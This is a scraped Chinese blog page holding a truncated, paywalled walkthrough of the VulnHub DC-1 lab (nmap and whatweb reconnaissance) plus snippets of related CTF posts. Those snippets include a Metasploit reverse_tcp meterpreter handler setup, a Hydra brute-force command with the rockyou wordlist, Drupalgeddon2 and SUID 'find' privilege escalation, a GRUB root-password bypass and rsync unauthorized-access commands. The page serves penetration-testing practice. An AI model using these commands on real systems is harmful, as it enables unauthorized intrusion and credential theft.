VulnHub--DC-1--flag

原创 已于 2022-07-06 09:05:48 修改 · 392 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ip

于 2022-04-08 22:05:03 首次发布
本文介绍了在VulnHub上针对DC-1靶机进行渗透测试的过程,包括扫描存活主机、识别开放端口、利用Drupal 7漏洞、提权、数据库操作以及解密密码等步骤,最终找到并读取了多个flag。

配置网络为nat模式(你需要知道你的靶机的IP网段,最好与kali攻击机处于同一网段)
在这里插入图片描述
在这里插入图片描述
查看net模式下的网段 192.168.15.0
在这里插入图片描述
我们查看一下kali的IP地址 kali的IP192.168.15.142
在这里插入图片描述
Nmap -Sp 192.168.15.0/24扫描存活主机

在这里插入图片描述
我们就的到了DC-1的ip192.168.15.143
我们扫描一下看下开放的端口
在这里插入图片描述
目标靶机开放ssh远程连接服务,HTTP服务
whatweb http://192.168.15.143扫描网站指纹信息

最低0.47元/天 解锁文章
DC-1如何找到flag
zk78697877的博客
10-17 478
对这个实验收获颇丰从中找到了自己的不足之处,也学到了不少东西对于分析也得到了很多帮助,新手小白望理解需要注意的是文章一些命令在复制时候会容易出现错误需要简单修改一下。需要用到SUID提权利用find命令,找查具有SUID权限的可执行二进制文件。登进去了,这样我们就可以修改数据库了,先看看有啥东西。先看一下发现的flag1.txt文件。查看这个加密的目录就能看到flag2了。利用工具Hydra爆破flag4的密码。查看一下目录发现了flag4。flag1.txt就出来了。找一下最后的flag
Vulnhub - DC-1
qq_46081990的博客
03-14 561
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
CTF平台靶场 支持动态Flag以及Docker分发
微风飘呀飘
06-26 3820
一、功能: 用户登录、注册、找回密码(支持邮箱验证、手机短信验证[互亿无线接口]) 注册邀请码开放 可在后台增加注册邀请码 也可以关闭邀请码 支持动态Flag和静态Flag 格式为:动态Flag头{md5(用户Key+题目随机)} 动态分数和静态分数 动态分数根据解题人数而定 最高1000PT 最低10PT 先几血积分、银两加成开放 可在后台根据自己需要配置 平台运行方式:练习 (正常查看题目和提交FLAG)、竞赛(需在规定时间内查看题目和提交FLAG) 前台主要功能:公告、解题、排行、商城.
Jordaninfosec靶场配置flag脚本过程
baidu_41553551的博客
06-06 418
一、修改root密码 1、选择箭头选中的选项enter进入,其他的系统可以在系统加载前使用长按shift、点击ESC或者是点击e 、 2、按方向键到这两个选项中的任何一个,输入e 3、出现下面的界面,按方向键一直到末尾 4、将recovery nomodeset删除,其他的系统可能在 recovery nomodeset后还有些内容,那个不用管,都统一在行末加上quiet splash rw init=/bin/bash 5、按F10或者ctrl+x后出现如下界面,有些电脑按.
DC-1-flag5完结
Mr_helloword的博客
07-11 534
** Flag-4 ** 根据提示我们查看/etc/passwd(linux用户组目录) 这里我们发现Flag4用户,但是我们没有权限 之前查看端口,该服务器开发22端口,我们可以尝试远程爆力破解: -l 用户名 -P 指定密码字典 -vV 显示爆破详细信息 -f 如果找到密码就停止爆破 -o 爆破结果输出文件 爆破成功发现密码远程登陆: ** flag5 ** 1.根据flag4的提示发现了5的线索但是没有root权限无法进入家目录: 2.是否具有一些命令具有SUID标识及提权:(除此
DC-1靶机复现
weixin_43980115的博客
03-21 1683
下载安装DC-1,并启动DC-1 下载地址:https://www.five86.com/downloads/DC-1.zip 下载完解压后会有一个以.ova为后缀的文件,直接在VM种用”打开虚拟机”,在设置中修改网络适配器为NET模式。 在这里记一下DC-1的MAC地址,等下用的到。 启动DC-1时开机就好,不用输用户名和密码登录(你也不知道呀) 打开kali,查看kali的IP地址和子网掩码 因为DC-1和kali现在属于同一个网段,查看kali的IP和子网掩码是为了获得DC-1的网络号
VulnHub-DC-2靶机渗透教程
最新发布
苏生要努力
04-24 1075
直接使用VMware导入打开就行。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 4655
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag
Vulnhub-DC-2实战靶场
ierciyuan的博客
10-27 4124
vulnhubdc-2靶场。信息收集、漏洞利用等,详细的分步打靶。
国产开源网络安全渗透测试集成靶场vulfocus
顺其自然~专栏
10-17 3230
进入项目所在的目录的vulfocus-api文件夹目录下,执行下面命令。
vulnhub靶场 prime1靶机获得flag
weixin_43410194的博客
08-17 2240
vulnhub靶场 prime1靶机获得flag
ChainFlag靶场实战(一)
m0_68764244的博客
01-02 855
靶场wpmore。
kali对CTF靶场进行渗透测试找flag
勤能补拙
05-09 2942
kali Linux做攻击机渗透测试CTF靶场flag
VULFOCUS靶场CVE-2020-5504漏洞复现拿flag
u013345705的博客
07-18 3090
VULFOCUS CVE-2020-5504
CTF本地靶场搭建——静态flag题型的创建
qq_44373268的博客
06-02 1057
静态容器内的内容对所有队伍而言是相同的,并且其中包含的静态flag用于验证队伍是否成功找到了预设的漏洞或完成了特定的安全挑战,而不是通过攻击其他队伍来获取flag。静态flag意味着这些flag是预先设定好的,不会随比赛进程或队伍行为动态改变,与之相对的是动态flag,动态flag可能会根据攻击或防守的情况发生变化。然而,如果要将静态flag的概念映射到更传统的CTF题型上,它可以出现在任何需要验证固定解决方案的题目中,比如在某些**Misc(杂项)或特定情境下的Web、**Crypto(密码学)
靶场DC-1
sunxueer的博客
07-26 934
DC-1靶机环境:1. 打开虚拟机2. 信息收集2.1 nmap扫描存活主机确定DC-1ip地址2.2 利用namp扫描DC-1开放的端口2.3 访问80端口2.4 寻找Drupal版本信息(多种办法)2.5 寻找此版本Drupal的漏洞2.6 使用漏扫工具OpenVas3. 漏洞利用(CVE-2018-7600)3.1 寻找flag13.2 寻找flag23.3 寻找flag33.4 寻找flag43.5 寻找flag5补充:OpenVas中的CVE-2014-3704也可以做 环境: 靶机名称:DC-
Vulfocus之tomcat系列题目获取flag攻略
weixin_45130489的博客
09-19 2667
快速通关靶场,3个tomcat漏洞的题目。
关于vulnhub靶场获取flag基本流程和方法
qq_54030686的博客
11-14 2913
关于vulnhub靶场获取flag基本流程和方法 将目标虚拟机和kali(个人主机)使用桥接或者nat模式连接到同一个C段下 1.发现 使用nmap,netdiscover进行主机发现,找到你的目标主机(192.168.0.1/24,192.168…0.1-255) nmap 参数 -sn 不扫描端口,只ping主机 -PE 通过ICMP echo判定主机是否存活 2.端口探测 使用nmap 进行扫描 使用-p 65535 进行全端口扫描 –A综合扫描 -O 系统扫描 端口容易出现的问题 21
未授权漏洞vulfocu靶场实战
beichenyyds的博客
03-03 7507
rsync未授权漏洞 打开会有一个输入flag的文本框,所以我们需要查找flag如图 把网站的ip信息收集到如图 在kali终端进入 (root💀kali)-[~/vulhub/rsync]目录下输入 rsync rsync://123.58.236.76 :19358/src/ 上面也说了flag在tmp目录下所以输入 rsync rsync://123.58.236.76:19358/src/tmp/ 可以查到flag 如图 复制到靶场flag位置 可以看到
vulnhub靶机dc-1
01-11
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值